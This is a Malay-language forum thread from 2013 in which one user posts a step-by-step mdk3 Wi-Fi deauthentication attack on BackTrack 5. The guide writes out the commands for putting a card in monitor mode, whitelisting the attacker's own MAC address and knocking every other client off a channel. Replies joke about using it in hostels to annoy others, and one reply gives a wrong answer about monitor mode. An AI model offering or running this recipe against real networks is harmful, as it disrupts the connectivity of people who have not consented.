Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Disconnect User Using mdk3
25-11-2013, 07:01 PM,
Post: #1
Disconnect User Using mdk3
Assalamualaikum TBDian,
Hari ni saya akan kongsikan lagi bab networking.Kali ni kita gunakan mdk3 lagi kerana ia senjata ampuh dalam BT5 Me Gusta ok jom tgok:

1- start terminal dan:
Code:
ifconfig

copy mac address korang
[Image: j16jat.jpg]

2- kemudian hidupkan mod mon0
Code:
airmon-ng start wlan0

3- selesai step ke-2? isikan mac addr kedalam file whitelist.txt untuk mengelakkan diri sendiri di-netcut.whitelist.txt ni korang boleh buat dan simpan di dir root:
Code:
echo mac_addr_anda > whitelist.txt
[Image: i20euf.jpg]

4- Time for Attack! buka terminal yang lain dan jalankan command:
Code:
mdk3 mon0 d -c channel_wireless -w whitelist.txt
[Image: 2afcw2o.jpg]

Quote:selepas korang lancarkan command nih automatik semua client akan disconnect
kecuali komputer korang jea sebab dh tersenarai dalam whitelist.txt yg kita buat tadi
If you control the code,
You can ConTROLL the world!
Reply
25-11-2013, 07:18 PM, (This post was last modified: 25-11-2013, 07:18 PM by fatah.)
Post: #2
RE: Disconnect User Using mdk3
Sayang forum dah takda, dulu pernah lepak dengan owner mdk3 (aspj) bincang pasal rt73 linux driver & packet injection. Sekarang dah zaman mac80211, layer 2 monitoring & packet injection menjadi mudah untuk semua orang.

http://fatah.afraid.org/files/rt73-project/
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply
25-11-2013, 07:33 PM,
Post: #3
RE: Disconnect User Using mdk3
(25-11-2013, 07:18 PM)fatah Wrote: Sayang forum dah takda, dulu pernah lepak dengan owner mdk3 (aspj) bincang pasal rt73 linux driver & packet injection. Sekarang dah zaman mac80211, layer 2 monitoring & packet injection menjadi mudah untuk semua orang.

http://fatah.afraid.org/files/rt73-project/

ko lepak forum mdk3 kt mana =O nk ikut gak
If you control the code,
You can ConTROLL the world!
Reply
25-11-2013, 08:17 PM,
Post: #4
RE: Disconnect User Using mdk3
rasanya forum tinyshell -or- forum aircrack-ng. dah lama & lupa.
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply
25-11-2013, 10:01 PM,
Post: #5
RE: Disconnect User Using mdk3
salam..tumpang tanya.. ni kire mcm netcut ke bro ?
Reply
25-11-2013, 11:40 PM,
Post: #6
RE: Disconnect User Using mdk3
benda ni kalau buat kat hostel buat orang rage Fuu!
Reply
26-11-2013, 03:04 AM,
Post: #7
RE: Disconnect User Using mdk3
do i need set monitor mode at first?
Reply
26-11-2013, 08:50 PM, (This post was last modified: 26-11-2013, 08:52 PM by zaidroid.)
Post: #8
RE: Disconnect User Using mdk3
(25-11-2013, 10:01 PM)KaptenMY Wrote: salam..tumpang tanya.. ni kire mcm netcut ke bro ?
ya ni mmg netcut sesuai untuk pengujian hehe

(26-11-2013, 03:04 AM)linear Wrote: do i need set monitor mode at first?
this is optional bro Troll Face
If you control the code,
You can ConTROLL the world!
Reply
26-11-2013, 11:23 PM,
Post: #9
RE: Disconnect User Using mdk3
(26-11-2013, 08:50 PM)zaidroid Wrote:
(25-11-2013, 10:01 PM)KaptenMY Wrote: salam..tumpang tanya.. ni kire mcm netcut ke bro ?
ya ni mmg netcut sesuai untuk pengujian hehe

(26-11-2013, 03:04 AM)linear Wrote: do i need set monitor mode at first?
this is optional bro Troll Face

Nak copy bole? share dgn kwn2 Hmm
Reply
26-11-2013, 11:36 PM,
Post: #10
RE: Disconnect User Using mdk3
(26-11-2013, 08:50 PM)zaidroid Wrote:
(25-11-2013, 10:01 PM)KaptenMY Wrote: salam..tumpang tanya.. ni kire mcm netcut ke bro ?
ya ni mmg netcut sesuai untuk pengujian hehe

(26-11-2013, 03:04 AM)linear Wrote: do i need set monitor mode at first?
this is optional bro Troll Face

not optional, but compulsary, last time i test several years ago. please do some research. GayFace
̿ ̿ ̿̿'̿̿\̵͇̿̿\=(•̪●)=/̵͇̿̿/'̿̿ ̿ ̿ ̿ - انا کڤيتݢولوڠ
http://fatah.afraid.org/
[Image: 763440762.png]
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
Sad Internet Auto Disconnect ahmadfikrizaman 36 2,531 01-11-2013, 10:34 PM
Last Post: ahmadfikrizaman
  VPN Disconnect After 1-2 Minutes? D4RK_5Y5T3M 19 1,571 02-12-2012, 03:35 AM
Last Post: Wushipher

Forum Jump: